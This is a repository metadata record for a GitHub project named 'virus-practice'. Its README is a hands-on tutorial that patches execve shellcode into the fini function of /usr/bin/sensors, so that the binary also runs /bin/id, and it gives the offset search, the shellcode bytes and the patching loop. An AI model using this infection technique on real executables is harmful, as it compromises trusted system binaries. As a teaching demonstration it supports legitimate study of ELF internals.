{"id":27021333,"url":"https://github.com/oditynet/virus-practice","last_synced_at":"2025-07-22T10:03:33.391Z","repository":{"id":279984839,"uuid":"940645854","full_name":"oditynet/virus-practice","owner":"oditynet","description":"I will describe the practice of infecting ELF files on Linux","archived":false,"fork":false,"pushed_at":"2025-02-28T15:14:36.000Z","size":24,"stargazers_count":1,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-04T19:51:19.315Z","etag":null,"topics":["tutorial-sourcecode","virus"],"latest_commit_sha":null,"homepage":"","language":"C","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/oditynet.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-28T14:43:49.000Z","updated_at":"2025-03-19T16:05:45.000Z","dependencies_parsed_at":"2025-03-01T10:31:35.974Z","dependency_job_id":null,"html_url":"https://github.com/oditynet/virus-practice","commit_stats":null,"previous_names":["oditynet/virus-practice"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/oditynet/virus-practice","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice/manifests","owner_url":"https://repos.ecosyste.ms/ap
i/v1/hosts/GitHub/owners/oditynet","download_url":"https://codeload.github.com/oditynet/virus-practice/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/oditynet%2Fvirus-practice/sbom","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":266472705,"owners_count":23934468,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-07-22T02:00:09.085Z","response_time":66,"last_error":null,"robots_txt_status":null,"robots_txt_updated_at":null,"robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["tutorial-sourcecode","virus"],"created_at":"2025-04-04T19:50:02.087Z","updated_at":"2025-07-22T10:03:33.343Z","avatar_url":"https://github.com/oditynet.png","language":"C","funding_links":[],"categories":[],"sub_categories":[],"readme":"# virus-practice\nI will describe the practice of infecting ELF files on Linux\nOur test subject: /usr/bin/sensors\n\nFirst we need to make sure the program was not compiled with the -fPIC protection bit. To do this we look for the .got.plt fields in the headers (we do not want to execute a command in a memory region and get a segmentation fault):\n```\nreadelf -a sensors|grep \".got.plt\"\n  [22] .got.plt          PROGBITS         0000000000006fe8  00006fe8\n   05     .init_array .fini_array .data.rel.ro .dynamic .got .got.plt .data .bss \n   12     .init_array .fini_array .data.rel.ro .dynamic .got .got.plt \n```\n00006fe8 - very good. 
Now let us find the offset for the injection\n```\nr2 -A /usr/bin/sensors\nafl\n0x000027f0    5     55 entry.fini0\nq\nobjdump -d /usr/bin/sensors|grep -A2 \"27f0\"\n    27f0:\tf3 0f 1e fa          \tendbr64\n    27f4:\t80 3d a5 48 00 00 00 \tcmpb   $0x0,0x48a5(%rip)        # 0x70a0\n    27fb:\t75 33                \tjne    0x2830\n```\nA suitable offset for us will be a=0x000027f4 (remember it)\n\nWe choose what to inject. In my case it will be execution of the /bin/id command\n\nHere is a script for converting the string to hex\n```\n odity@viva  ~/bin/elf  cat rev.py          \ndef rev_str(s):\n    return s[:: - 1]\ns = '/bin/id'\ns= rev_str(s)\nfor i in s:\n    t=hex(ord(i))\n    print(t[2:])\n\n```\nWe run it and get ...\n```\n✘ odity@viva  ~/bin/elf  python rev.py|tr -d '\\n'\n64692f6e69622f%      \n```\nWe put the string into syscall-id.asm and assemble it. Strictly speaking this step is unnecessary; it is here so that you can see more clearly what to take from where. Once assembled, we get the opcodes of our instructions from the syscall-id executable:\n```\nobjdump -d syscall-id\nизассемблирование раздела .text:\n\n0000000000401000 \u003c.text\u003e:\n  401000:\t48 31 d2             \txor    %rdx,%rdx\n  401003:\t52                   \tpush   %rdx\n  401004:\t48 b8 2f 62 69 6e 2f \tmovabs $0x64692f6e69622f,%rax\n  40100b:\t69 64 00 \n  40100e:\t50                   \tpush   %rax\n  40100f:\t48 89 e7             \tmov    %rsp,%rdi\n  401012:\t52                   \tpush   %rdx\n  401013:\t57                   \tpush   %rdi\n  401014:\t48 89 e6             \tmov    %rsp,%rsi\n  401017:\t48 31 c0             \txor    %rax,%rax\n  40101a:\tb0 3b                \tmov    $0x3b,%al\n  40101c:\t0f 05                \tsyscall\n```\n\nStarting from 48 up to 05 we write out the opcodes and generate the injection with my hexedit utility.... 
(the last one will be opcode c3)\n\n```\na=0x000027f4;for i in $(echo \"48 31 d2 52 48 b8 2f 62 69 6e 2f 69 64 00 50 48 89 e7 52 57 48 89 e6 48 31 c0 b0 3b 0f 05 c3\"); do printf \"./hexedit sensors 0x0000%X 0x%02X\\n\" $(($a)) \"0x\"$i; a=0x0000$(([##16] $a+0x1));done\n```\nThe offset 0x000027f4 was found earlier. We run the script, then the file itself, and...\n\n```\n odity@viva  ~/bin/elf  ./sensors \ncoretemp-isa-0000\nAdapter: ISA adapter\nPackage id 0:  +22.0°C  (high = +84.0°C, crit = +100.0°C)\nCore 0:        +19.0°C  (high = +84.0°C, crit = +100.0°C)\nCore 1:        +21.0°C  (high = +84.0°C, crit = +100.0°C)\nCore 2:        +19.0°C  (high = +84.0°C, crit = +100.0°C)\nCore 3:        +19.0°C  (high = +84.0°C, crit = +100.0°C)\n\nacpitz-acpi-0\nAdapter: ACPI interface\ntemp1:        +27.8°C  \ntemp2:        +29.8°C  \n\nuid=1000(odity) gid=1000(odity) groups=1000(odity),958(libvirt-qemu),959(libvirt),992(kvm),998(wheel)\n```\n# PROFIT\n\nWe compare the original file with the cracked one.\n\n```\n640,642c640,642\n\u003c 000027f0: f30f 1efa 4831 d252 48b8 2f62 696e 2f69  ....H1.RH./bin/i\n\u003c 00002800: 6400 5048 89e7 5257 4889 e648 31c0 b03b  d.PH..RWH..H1..;\n\u003c 00002810: 0f05 c315 a047 0000 e863 ffff ffc6 057c  .....G...c.....|\n---\n\u003e 000027f0: f30f 1efa 803d a548 0000 0075 3355 4883  .....=.H...u3UH.\n\u003e 00002800: 3db2 4700 0000 4889 e574 0d48 8b3d f647  =.G...H..t.H.=.G\n\u003e 00002810: 0000 ff15 a047 0000 e863 ffff ffc6 057c  .....G...c.....|\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foditynet%2Fvirus-practice","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Foditynet%2Fvirus-practice","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Foditynet%2Fvirus-practice/lists"}